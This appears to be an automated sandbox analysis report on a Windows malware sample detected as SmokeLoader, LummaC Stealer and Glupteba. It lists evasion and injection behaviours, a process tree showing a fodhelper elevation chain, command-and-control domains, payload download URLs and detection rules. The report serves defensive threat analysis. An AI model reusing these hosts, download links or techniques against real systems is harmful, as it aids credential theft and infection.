Edit tour

Windows Analysis Report
HVqTxn73uD.exe

Overview

General Information

Sample name:	HVqTxn73uD.exe renamed because original name is a hash value
Original sample name:	68ffed54965b0f0695d96e4b507ce795.exe
Analysis ID:	1365943
MD5:	68ffed54965b0f0695d96e4b507ce795
SHA1:	18e188b3478432c2859502bd96f9ad73a460d2a9
SHA256:	138725f202fb8202fbe3a46e978fa69000428a59fa2a5fdcba1c374bdbe20aab
Tags:	exeLummaStealer
Infos:

Detection

Glupteba, LummaC Stealer, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Glupteba

Yara detected LummaC Stealer

Yara detected SmokeLoader

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Drops PE files with benign system names

Found Tor onion address

Found evasive API chain (may stop execution after checking computer name)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries the IP of a very long domain name

Sample uses string decryption to hide its real strings

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to resolve many domain names, but no domain seems valid

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

HVqTxn73uD.exe (PID: 6584 cmdline: C:\Users\user\Desktop\HVqTxn73uD.exe MD5: 68FFED54965B0F0695D96E4B507CE795)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

2788.exe (PID: 3504 cmdline: C:\Users\user\AppData\Local\Temp\2788.exe MD5: EE1049D8F8248D11080582FE27F96843)

2788.exe (PID: 6380 cmdline: C:\Users\user\AppData\Local\Temp\2788.exe MD5: EE1049D8F8248D11080582FE27F96843)

3EBB.exe (PID: 5600 cmdline: C:\Users\user\AppData\Local\Temp\3EBB.exe MD5: 033576B4B54E5CB69EC8491FF6624C9F)

3EBB.exe (PID: 6188 cmdline: C:\Users\user\AppData\Local\Temp\3EBB.exe MD5: 033576B4B54E5CB69EC8491FF6624C9F)

4294.exe (PID: 5700 cmdline: C:\Users\user\AppData\Local\Temp\4294.exe MD5: 08DEB048589E4E6D6F16AB66BD1020F8)

conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regsvr32.exe (PID: 5296 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\46BC.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 5704 cmdline: /s C:\Users\user\AppData\Local\Temp\46BC.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

csrss.exe (PID: 180 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: EE1049D8F8248D11080582FE27F96843)

csrss.exe (PID: 1216 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: EE1049D8F8248D11080582FE27F96843)

5F46.exe (PID: 1776 cmdline: C:\Users\user\AppData\Local\Temp\5F46.exe MD5: A84E7EB772595B1A76602790959A2124)

6F54.exe (PID: 6536 cmdline: C:\Users\user\AppData\Local\Temp\6F54.exe MD5: 18C733D5D4D7CD4235F6293685A5C817)

cmd.exe (PID: 5728 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

fodhelper.exe (PID: 2568 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)

fodhelper.exe (PID: 6672 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)

fodhelper.exe (PID: 5892 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)

6F54.exe (PID: 1100 cmdline: "C:\Users\user\AppData\Local\Temp\6F54.exe" MD5: 18C733D5D4D7CD4235F6293685A5C817)

powershell.exe (PID: 6500 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

6F54.exe (PID: 5248 cmdline: C:\Users\user\AppData\Local\Temp\6F54.exe MD5: 18C733D5D4D7CD4235F6293685A5C817)

powershell.exe (PID: 5704 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

csrss.exe (PID: 6120 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: EE1049D8F8248D11080582FE27F96843)

csrss.exe (PID: 4912 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: EE1049D8F8248D11080582FE27F96843)

TrustedInstaller.exe (PID: 3504 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: D098F2FC042FBF6879D47E3A86FBB4A1)

sfriduf (PID: 6484 cmdline: C:\Users\user\AppData\Roaming\sfriduf MD5: 68FFED54965B0F0695D96E4B507CE795)

fcriduf (PID: 4996 cmdline: C:\Users\user\AppData\Roaming\fcriduf MD5: A84E7EB772595B1A76602790959A2124)

fcriduf (PID: 3288 cmdline: C:\Users\user\AppData\Roaming\fcriduf MD5: A84E7EB772595B1A76602790959A2124)

sfriduf (PID: 6252 cmdline: C:\Users\user\AppData\Roaming\sfriduf MD5: 68FFED54965B0F0695D96E4B507CE795)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Glupteba	Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.	No Attribution	http://resources.infosecinstitute.com/tdss4-part-1/ https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ https://blog.google/technology/safety-security/new-action-combat-cyber-crime/ https://blog.google/threat-analysis-group/disrupting-glupteba-operation/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/	https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["dayfarrichjwclik.fun", "neighborhoodfeelsa.fun", "ratefacilityframw.fun", "reviveincapablewew.pw", "cakecoldsplurgrewe.pw", "opposesicknessopw.pw", "politefrightenpowoa.pw"], "Build id": "NmLpQW--spam2"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1971295598.0000000000910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2274952630.00000000009C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2274907506.0000000000898000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x70fd:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2396120537.000000000040D000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2032488067.0000000000900000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2032558481.0000000000A21000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2032558481.0000000000A21000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000021.00000002.2590161504.00000000032B3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000000.00000002.2032639439.0000000000AB9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7755:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2275022299.0000000002490000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2275022299.0000000002490000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000002.2496448528.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000002.2496448528.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x674:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000003.2224102941.0000000002490000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000021.00000003.2563945392.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000024.00000002.2747452947.00000000008D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000024.00000002.2747452947.00000000008D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x674:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000021.00000002.2590161504.0000000002E70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2332039620.000000000508F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000021.00000002.2589650325.0000000002A6E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000024.00000003.2695604056.00000000008D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000003.2440312745.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000002.2496691217.00000000024E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000002.2496691217.00000000024E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x274:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000024.00000002.2747774480.0000000000929000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6e47:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000002.2496586811.0000000000A58000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x733f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001A.00000002.2537616639.0000000005600000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2275065995.00000000024C1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2275065995.00000000024C1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000024.00000002.2748251512.00000000024C1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000024.00000002.2748251512.00000000024C1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x274:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000025.00000003.4351039490.00000000008D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.2443676408.0000000005600000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000002.2496417036.00000000009E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000026.00000003.4351072817.0000000000A40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2032530919.0000000000A00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2032530919.0000000000A00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000024.00000002.2747425610.00000000008C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000021.00000002.2587451571.0000000000843000.00000040.00000001.01000000.0000001B.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000010.00000003.2500426400.0000000003BE2000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000019.00000003.2528540786.0000000003C82000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author
38.3.sfriduf.a40000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
14.2.5F46.exe.9e0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.fcriduf.8c0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
14.3.5F46.exe.9f0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.HVqTxn73uD.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.2.sfriduf.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.fcriduf.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.2.4294.exe.580000.1.unpack	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
0.2.HVqTxn73uD.exe.900e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
37.3.fcriduf.8d0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.3.HVqTxn73uD.exe.910000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.3.sfriduf.2490000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.2.sfriduf.9c0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
14.2.5F46.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.3.fcriduf.8d0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.2.4294.exe.400000.0.unpack	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
33.2.6F54.exe.400000.5.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
33.2.6F54.exe.2e70e67.14.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
33.3.6F54.exe.3760000.5.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
16.3.6F54.exe.37a0000.5.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
25.3.6F54.exe.3840000.5.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Click to see the 16 entries

Snort Signatures

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.94.245.237 - Destination IP: 192.168.2.5

Timestamp:	34.94.245.237192.168.2.580497112037771 12/22/23-04:57:13.380390
SID:	2037771
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.143.166.163 - Destination IP: 192.168.2.5

Timestamp:	34.143.166.163192.168.2.580497132037771 12/22/23-04:57:15.677804
SID:	2037771
Source Port:	80
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 104.198.2.251 - Destination IP: 192.168.2.5

Timestamp:	104.198.2.251192.168.2.580497122037771 12/22/23-04:57:14.223963
SID:	2037771
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://sumagulituyo.org/	URL Reputation: Label: malware
Source: politefrightenpowoa.pw	URL Reputation: Label: malware
Source: http://diagramfiremonkeyowwa.fun/apiR	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/x	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/1H	Avira URL Cloud: Label: malware
Source: https://linkofstrumble.com/dad9b3a52c30c4733cf934e71716b3dc/288c47bbc1871b439df19ff4df68f076.exe	Avira URL Cloud: Label: malware
Source: https://shpilliwilli.com/288c47bbc1871b439df19ff4df68f076.exe	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/l	Avira URL Cloud: Label: malware
Source: http://bombertublestylebanws.fun/api	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/apiMy	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/lr	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/xv	Avira URL Cloud: Label: malware
Source: http://dayfarrichjwclik.fun/	Avira URL Cloud: Label: malware
Source: neighborhoodfeelsa.fun	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/api	Avira URL Cloud: Label: malware
Source: http://ftpvoyager.cc/ftp/index.php	Avira URL Cloud: Label: malware
Source: cakecoldsplurgrewe.pw	Avira URL Cloud: Label: malware
Source: http://cream.hitsturbo.com/order/tuc5.exe	Avira URL Cloud: Label: malware
Source: dayfarrichjwclik.fun	Avira URL Cloud: Label: malware
Source: http://neighborhoodfeelsa.fun/	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/apiX	Avira URL Cloud: Label: malware
Source: reviveincapablewew.pw	Avira URL Cloud: Label: malware
Source: http://dayfarrichjwclik.fun/api	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/apib	Avira URL Cloud: Label: malware
Source: http://diagramfiremonkeyowwa.fun/	Avira URL Cloud: Label: malware
Source: http://neighborhoodfeelsa.fun/api	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Avira: detection malicious, Label: HEUR/AGEN.1303615
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Avira: detection malicious, Label: HEUR/AGEN.1316840
Source: C:\ProgramData\Drivers\csrss.exe	Avira: detection malicious, Label: HEUR/AGEN.1316840

Found malware configuration

Source: 00000000.00000002.2032558481.0000000000A21000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}
Source: 8.2.4294.exe.580000.1.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["dayfarrichjwclik.fun", "neighborhoodfeelsa.fun", "ratefacilityframw.fun", "reviveincapablewew.pw", "cakecoldsplurgrewe.pw", "opposesicknessopw.pw", "politefrightenpowoa.pw"], "Build id": "NmLpQW--spam2"}

Multi AV Scanner detection for domain / URL

Source: cream.hitsturbo.com	Virustotal: Detection: 19%	Perma Link
Source: lightseinsteniki.org	Virustotal: Detection: 20%	Perma Link
Source: humydrole.com	Virustotal: Detection: 15%	Perma Link
Source: stualialuyastrelia.net	Virustotal: Detection: 23%	Perma Link
Source: shpilliwilli.com	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Drivers\csrss.exe	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\2788.exe	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\4294.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\46BC.dll	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Roaming\sfriduf	ReversingLabs: Detection: 37%

Multi AV Scanner detection for submitted file

Source: HVqTxn73uD.exe	ReversingLabs: Detection: 37%
Source: HVqTxn73uD.exe	Virustotal: Detection: 45%			Perma Link

Yara detected Glupteba

Source: Yara match	File source: 33.2.6F54.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6F54.exe.2e70e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.6F54.exe.3760000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.6F54.exe.37a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.6F54.exe.3840000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2590161504.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2563945392.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2587451571.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2500426400.0000000003BE2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2528540786.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\46BC.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Drivers\csrss.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: HVqTxn73uD.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: dayfarrichjwclik.fun
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: neighborhoodfeelsa.fun
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: ratefacilityframw.fun
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: reviveincapablewew.pw
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: cakecoldsplurgrewe.pw
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: opposesicknessopw.pw
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: politefrightenpowoa.pw
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
